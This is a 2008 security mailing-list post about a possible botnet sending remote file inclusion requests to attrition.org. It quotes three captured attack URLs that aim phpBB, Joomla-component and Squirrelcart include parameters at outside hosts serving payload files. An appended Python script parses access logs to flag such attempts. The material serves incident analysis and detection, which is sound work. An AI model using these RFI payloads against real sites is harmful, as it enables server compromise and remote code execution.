[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 10:04:39 UTC 2008
For a while I've noticed a ton of RFI requests made to attrition.org; the
frequency and patterns suggest it's possibly a large botnet. I haven't had
time to really dig into the logs and learn much about it. Tonight I saw
one request come across and got curious how many of these requests were
published vulnerabilities versus potential 0-day. Many requests don't have
enough information to easily determine the software (e.g.
/dir/index.php?id=http://), but this may:
/claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
I don't see reference to "page_tail.php" in CVE or OSVDB. The directory
structure suggests it is either in Claroline or phpBB though.
http://www.claroline.net/download/stable.html
Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file
above.
http://www.phpbb.com/downloads/
Version 2.0.23 ("legacy") has "page_tail.php" in it.
Version 3.0.0 (phpBB3) has no file by that name.
--
So, does anyone want to see if it is truly vulnerable? If so, we know it's
phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we
know it is actively being exploited in the wild and discovered as a result
of it.
Brian
p.s. While writing this, a full example of one that would be a tad harder
to track down but, given the "com_comprofiler" and
"mosConfig_absolute_path", shouldn't be that difficult:
/index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f
p.p.s. And an example of an older disclosed vulnerability being used:
/squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
(CVE-2006-2483 / OSVDB 25523)
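A log triage script along the lines of what Brian describes, added here as an example and not part of the original post: it pulls out every request parameter whose value is a remote URL, records the script and parameter name (the pair to look up in CVE/OSVDB), and flags the trailing "??" padding. The log lines and the include host are constructed placeholders, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format); the include host
# is a placeholder, the script/parameter pairs mirror the ones in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Mar/2008:03:12:44 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://include-host.example/id2.txt%3f%3f HTTP/1.1" 404 211
203.0.113.7 - - [20/Mar/2008:03:13:01 +0000] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://include-host.example/id.txt%3f%3f HTTP/1.1" 200 5120
198.51.100.9 - - [20/Mar/2008:03:13:30 +0000] "GET /squirrelcart/cart_content.php?cart_isp_root=http://include-host.example/id2.txt%3f%3f HTTP/1.1" 404 211
192.0.2.4 - - [20/Mar/2008:03:14:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1780
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tell-tale RFI value: a remote scheme in a parameter that should be a local
# path. The trailing "??" (%3f%3f) turns whatever the vulnerable include
# appends after the injected value into a query string on the remote side.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def rfi_attempts(log_text):
    """One record per request parameter whose (decoded) value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes names and values, so %5b..%5d and %3f come
        # back as "[..]" and "?"; keep blanks so "_REQUEST=" does not hide others.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not REMOTE_RE.match(value):
                continue
            hits.append({
                "src_ip": m.group("ip"),
                "status": int(m.group("status")),
                "script": parts.path,
                "param": name,
                "include_host": urlsplit(value).hostname,
                "padded": value.endswith("??"),
            })
    return hits


def candidate_targets(hits):
    """Distinct (script, parameter) pairs: what to check against CVE/OSVDB."""
    return sorted({(h["script"], h["param"]) for h in hits})


if __name__ == "__main__":
    for script, param in candidate_targets(rfi_attempts(SAMPLE_LOG)):
        print(f"{script} ?{param}=<remote URL>")
```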